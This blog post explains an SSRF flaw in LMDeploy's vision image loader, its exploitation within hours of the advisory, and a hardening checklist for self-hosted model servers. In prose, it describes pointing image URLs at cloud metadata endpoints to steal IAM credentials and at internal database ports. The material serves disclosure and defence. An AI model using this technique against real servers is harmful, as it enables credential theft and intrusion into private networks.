An LMDeploy SSRF Was Exploited 12 Hours After the Advisory — With No Public PoC

On April 21 GitHub published the advisory for CVE-2026-33626 — a Server-Side Request Forgery in LMDeploy's load_image() function in the vision-language path. By 03:35 UTC on April 22, less than 13 hours later, a Sysdig honeypot caught the first exploitation attempt.

The attacker came out of Hong Kong, spent eight minutes inside the system, and used the vision image loader as a generic HTTP SSRF primitive. They scanned AWS Instance Metadata at 169.254.169.254, Redis on 6379, MySQL on 3306, and an internal admin panel on 8080. There was no public proof-of-concept anywhere on GitHub or paste sites. The advisory text — "fetches arbitrary URLs without validating internal/private IP addresses" — was enough.

If you're a solo operator who's been running a self-hosted LLM server inside your VPC because "it's behind a firewall, who would attack it" — that calculation just expired.

The exact primitive

The bug is straightforward. LMDeploy's vision-language pipeline accepts image URLs and fetches them server-side via load_image(). The function uses a standard HTTP client. It does not validate that the URL points to an external IP. It will happily fetch from 169.254.169.254, 127.0.0.1, 10.0.0.0/8, or any internal address you can name.

Stack that against a realistic 2026 deployment: LMDeploy running inside a VPC on EC2, the EC2 instance has an IAM role for accessing model weights from S3, the VPC has Redis and MySQL on default ports because "they're internal." The attacker sends a vision request with an image URL pointing at AWS IMDS, pulls the IAM credentials, and uses them to hit S3 directly. Or they probe the VPC for Redis and MySQL on default ports and exfil whatever's there.

The patch path: pin to the fixed LMDeploy release, add egress filtering on the model server, drop the vision-language image loader entirely if you don't use it. None of those are defaults. All of them require knowing the bug exists.

The pattern, named

LLM serving stacks are 2026's new attack surface category. They speak HTTP from inside trust boundaries. They take URLs as inputs — image loaders, RAG fetchers, tool callbacks. They're maintained by 1–3 people on Discord. The "supply chain" risk isn't just npm anymore. It's the YC-stage open-source LLM server you pip install'd six months ago and never updated.

LMDeploy is not the first and won't be the last. vLLM, Ollama, llama.cpp's HTTP server mode, Text Generation Inference — all are in the same shape. All speak HTTP, all run inside trust boundaries, all are maintained by small teams under heavy growth pressure where security defaults end up wherever the README ended up. The time-from-popularity-to-CVE is collapsing.

Why this is structurally a solo-operator problem

A Fortune 500 has a security team paging on CVEs the same day they publish. A solo dev sees the advisory three weeks later in a newsletter, by which point they've been scanned 50 times. The compensating control isn't "be faster at patching." It's network design. Solo operators systematically over-trust their own VPC.

This is a real failure mode. The instinct is "it's behind a firewall, the firewall is the security boundary." The reality is that an SSRF inside the firewall punches through the firewall by definition, because the firewall trusts requests originating from inside it. Defense in depth is the only defense; perimeter alone is not.

The 30-minute hardening pass

Four moves, in order.

Put the model server in its own VPC with explicit egress allowlist. No 169.254.0.0/16, no LAN, no 10.0.0.0/8 — only public CDN endpoints you actually use. If your model needs to fetch images, allowlist the specific image hosts. If it doesn't, block egress to the internet entirely.

Audit which features you actually use vs. what ships. LMDeploy's vision pipeline is opt-in for most workloads. If you're running text-only inference, load_image() should not be reachable. Read the config. Disable what you don't need.

Subscribe to advisories. Add the repos for every model-serving stack you run to a GitHub Security Advisory subscription. Pipe them to a Discord or Slack you actually read. The 13-hour window from advisory to exploit is the hardware constraint here — you cannot beat it without automation.

Move secrets off the box. No env-var IAM keys on the model server. Use IMDSv2 with hop-limit 1 (which would have blunted this specific attack — IMDSv2 with hop-limit 1 makes IMDS unreachable from a process running inside a container running on the EC2 host). Move long-lived credentials into a secrets manager and fetch them on startup.

The honest counter-take

Most solo devs are not running self-hosted inference for production traffic. They're using API-hosted models — Anthropic, OpenAI, DeepSeek, Google. If you're on a hosted API, this CVE is genuinely not your problem. The blast radius is zero.

But if you've been considering self-hosting "to save money," add the security operational tax to your build-vs-buy spreadsheet. The cost of running LMDeploy safely in 2026 is closer to $50/month of CloudWatch + Snyk + on-call attention than the $0 the README implies. The 12-hour exploitation window from this incident is the price line for that operational tax.

For a solo operator at sub-$10K MRR, the math points clearly toward hosted APIs. Self-hosted inference made sense in 2024 when the price gap was 10× and the security threat model was speculative. In 2026 the price gap is closer to 3×, the threat model is "you have ~12 hours from advisory to scan," and the right answer for most one-person shops is to keep using hosted APIs and stop viewing self-hosting as the obvious cost win.

The bigger picture

LMDeploy on April 21. Bitwarden npm targeting MCP configs on April 22. LeRobot pickle deserialization disclosed April 28. Three structurally different AI-infrastructure security wedges in eight days. Different attack surfaces, different defensive postures required, same underlying reality: the AI infrastructure layer is being shipped fast under heavy growth pressure, security defaults are wherever the README ended up, and the time from "popular project" to "CVE in the wild" is shrinking.

The right reaction isn't panic. The right reaction is the audit. Open every AI-adjacent dependency, identify what attack surface it exposes, and decide whether you're paying the operational tax to run it safely or whether you should be paying someone else to run it for you.

For LMDeploy specifically, the answer is probably the latter. For most of your stack, it might be too.

An LMDeploy SSRF Was Exploited 12 Hours After the Advisory — With No Public PoC

An LMDeploy SSRF Was Exploited 12 Hours After the Advisory — With No Public PoC

The exact primitive

The pattern, named

Why this is structurally a solo-operator problem

The 30-minute hardening pass

The honest counter-take

The bigger picture

Stay in the Loop

Related Posts

Researchers Just Scanned 1 Million Exposed AI Services. 31% of Public Ollama Servers Will Answer Anonymous Prompts. Here's the 10-Minute Saturday Fix.

Anthropic Just Stood Up a $1.5B Services Company With Blackstone and Goldman. Here's What Happens to the Indie AI Consultants Doing This Work Today.

Anthropic Just Shipped 10 Pre-Built Finance Agents. I Rated All Ten by Indie Utility — Three Are Genuinely Useful, Seven Aren't.